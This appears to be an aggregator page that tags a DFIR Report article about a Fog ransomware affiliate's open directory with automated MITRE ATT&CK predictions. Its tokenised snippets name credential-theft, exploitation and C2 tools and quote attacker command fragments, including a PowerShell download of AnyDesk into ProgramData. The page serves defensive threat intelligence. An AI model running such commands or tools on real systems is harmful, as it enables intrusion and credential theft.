TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

The DFIR Report

Navigating Through The Fog

editor · 2025-04-28 · Read original ↗

ATT&CK techniques detected

28 predictions
T1572Protocol Tunneling
99%
“as a sliver c2. it was not possible to analyze slv. bin and obtain further information out of the shellcode since it was encrypted. likely, it was used to connect back to the same sliver server. the binary sliver - client _ linux, is the executable used to connect to a sliver ser…”
T1046Network Service Discovery
99%
“and execute a port scan by performing the following actions : - reads and parses data. txt to get the ip address, username, password and domain name ( if any ) of the target appliance. - for every entry in data. txt, which represents a potential valid account, obtains the domain …”
T1486Data Encrypted for Impact
98%
“, credential theft, and command - and - control activities. among the tools were sonicwall scanner for exploiting vpn credentials, donpapi for extracting windows dpapi - protected credentials, certipy for abusing active directory certificate services ( ad cs ), zer0dump, and pach…”
T1558.003Kerberoasting
95%
“hashes. - – no _ recent : disables the collection of recent files and documents - – no _ sysadmins : excludes systems administrators from the credential collection process - - o < filename > : saves the output into a specific folder. the threat actor also employs dpapi. py from t…”
T1219Remote Access Tools
93%
“\ anydesk. exe - - get - id } a comprehensive description of anydesk and all the potential techniques to detect are detailed in lolrmm. io. credential access credentials from password stores donpapi & impacket dpapi : donpapi provides functionalities to locate and retrieve window…”
T1090.003Multi-hop Proxy
88%
“to drop shells and dump hashes. command & control proxy proxychains : proxychains is a tool used to route network traffic through proxy servers and it supports multiple types of proxies such as socks4, socks5 and https. proxychains can be combined with post - exploitation framewo…”
T1558.003Kerberoasting
87%
“##y to extract credentials from the compromised domain controller. - after exploitation, zer0dump attempts to restore the original machine account password. pachine & nopac : pachine and nopac are offensive tools developed to exploit cve - 2021 - 42278 and cve - 2021 - 42287 vuln…”
T1486Data Encrypted for Impact
86%
“navigating through the fog navigating through the fog key takeaways - an open directory associated with a ransomware affiliate, likely linked to the fog ransomware group, was discovered in december 2024. it contained tools and scripts for reconnaissance, exploitation, lateral mov…”
T1090.002External Proxy
85%
“to drop shells and dump hashes. command & control proxy proxychains : proxychains is a tool used to route network traffic through proxy servers and it supports multiple types of proxies such as socks4, socks5 and https. proxychains can be combined with post - exploitation framewo…”
T1219Remote Access Tools
83%
“, credential theft, and command - and - control activities. among the tools were sonicwall scanner for exploiting vpn credentials, donpapi for extracting windows dpapi - protected credentials, certipy for abusing active directory certificate services ( ad cs ), zer0dump, and pach…”
T1588.001Malware
81%
“, credential theft, and command - and - control activities. among the tools were sonicwall scanner for exploiting vpn credentials, donpapi for extracting windows dpapi - protected credentials, certipy for abusing active directory certificate services ( ad cs ), zer0dump, and pach…”
T1555.004Windows Credential Manager
78%
“\ anydesk. exe - - get - id } a comprehensive description of anydesk and all the potential techniques to detect are detailed in lolrmm. io. credential access credentials from password stores donpapi & impacket dpapi : donpapi provides functionalities to locate and retrieve window…”
T1219Remote Access Tools
70%
“url = " http : / / download. anydesk. com / anydesk. exe " $ file = " c : \ programdata \ anydesk. exe " $ clnt. downloadfile ( $ url, $ file ) # powershell mkdir " c : \ programdata \ anydesk " # powershell - command " ( new - object system. net. webclient ). downloadfile ( ' ht…”
T1046Network Service Discovery
66%
“which is then provided to nmap for port scanning. - once the nmap scan is completed, the netextender process is terminated. arctic wolf also linked the usage of compromised sonicwall credentials to fog ransomware. lateral movement remote services : smb / windows admin shares nete…”
T1090Proxy
61%
“to drop shells and dump hashes. command & control proxy proxychains : proxychains is a tool used to route network traffic through proxy servers and it supports multiple types of proxies such as socks4, socks5 and https. proxychains can be combined with post - exploitation framewo…”
T1059.004Unix Shell
56%
“a href = " v1. 0. 0. zip " > v1. 0. 0. zip < / a > < / li > < li > < a href = " videos / " > videos / < / a > < / li > < li > < a href = " zer0dump / " > zer0dump / < / a > < / li > < / ul > < hr > < / body > < / html > this company is listed in the fog ’ s data leak site, as sho…”
T1558.004AS-REP Roasting
53%
“from rc4 ( etype 23 ), which is common for kerberoasting attack, to aes - 256 ( etype 18 ) that is usual in legitimate traffic. based on the available. bash _ history file, the threat actor only downloaded the tool. privilege escalation exploitation for privilege escalation zer0d…”
T1558.003Kerberoasting
53%
“from rc4 ( etype 23 ), which is common for kerberoasting attack, to aes - 256 ( etype 18 ) that is usual in legitimate traffic. based on the available. bash _ history file, the threat actor only downloaded the tool. privilege escalation exploitation for privilege escalation zer0d…”
T1090.001Internal Proxy
51%
“to drop shells and dump hashes. command & control proxy proxychains : proxychains is a tool used to route network traffic through proxy servers and it supports multiple types of proxies such as socks4, socks5 and https. proxychains can be combined with post - exploitation framewo…”
T1219Remote Access Tools
48%
“navigating through the fog navigating through the fog key takeaways - an open directory associated with a ransomware affiliate, likely linked to the fog ransomware group, was discovered in december 2024. it contained tools and scripts for reconnaissance, exploitation, lateral mov…”
T1588.001Malware
45%
“- all intel : includes everything from private threat briefs and threat feed, plus private events, threat actor insights reports, long - term tracking, data clustering, and other curated intel. - private sigma ruleset : features 180 + sigma rules derived from 50 + cases, mapped t…”
T1219.002Remote Desktop Software
41%
“url = " http : / / download. anydesk. com / anydesk. exe " $ file = " c : \ programdata \ anydesk. exe " $ clnt. downloadfile ( $ url, $ file ) # powershell mkdir " c : \ programdata \ anydesk " # powershell - command " ( new - object system. net. webclient ). downloadfile ( ' ht…”
T1003OS Credential Dumping
40%
“, credential theft, and command - and - control activities. among the tools were sonicwall scanner for exploiting vpn credentials, donpapi for extracting windows dpapi - protected credentials, certipy for abusing active directory certificate services ( ad cs ), zer0dump, and pach…”
T1080Taint Shared Content
40%
“navigating through the fog navigating through the fog key takeaways - an open directory associated with a ransomware affiliate, likely linked to the fog ransomware group, was discovered in december 2024. it contained tools and scripts for reconnaissance, exploitation, lateral mov…”
T1546.004Unix Shell Configuration Modification
36%
“fog ransomware group based on : in a saved open - directory content retrieved through fofa. info, there is a folder called ouroverde. net. br which is a threat actor ’ s victim. <! doctype html public " - / / w3c / / dtd html 4. 01 / / en " " http : / / www. w3. org / tr / html4 …”
T1219Remote Access Tools
35%
“which is then provided to nmap for port scanning. - once the nmap scan is completed, the netextender process is terminated. arctic wolf also linked the usage of compromised sonicwall credentials to fog ransomware. lateral movement remote services : smb / windows admin shares nete…”
T1219.002Remote Desktop Software
34%
“which is then provided to nmap for port scanning. - once the nmap scan is completed, the netextender process is terminated. arctic wolf also linked the usage of compromised sonicwall credentials to fog ransomware. lateral movement remote services : smb / windows admin shares nete…”
T1588.002Tool
31%
“, credential theft, and command - and - control activities. among the tools were sonicwall scanner for exploiting vpn credentials, donpapi for extracting windows dpapi - protected credentials, certipy for abusing active directory certificate services ( ad cs ), zer0dump, and pach…”

Summary

Key Takeaways

An open directory associated with a ransomware affiliate, likely linked to the Fog ransomware group, was discovered in December 2024. It contained tools and scripts for reconnaissance, exploitation, lateral movement, and persistence...

The post Navigating Through The Fog appeared first on The DFIR Report.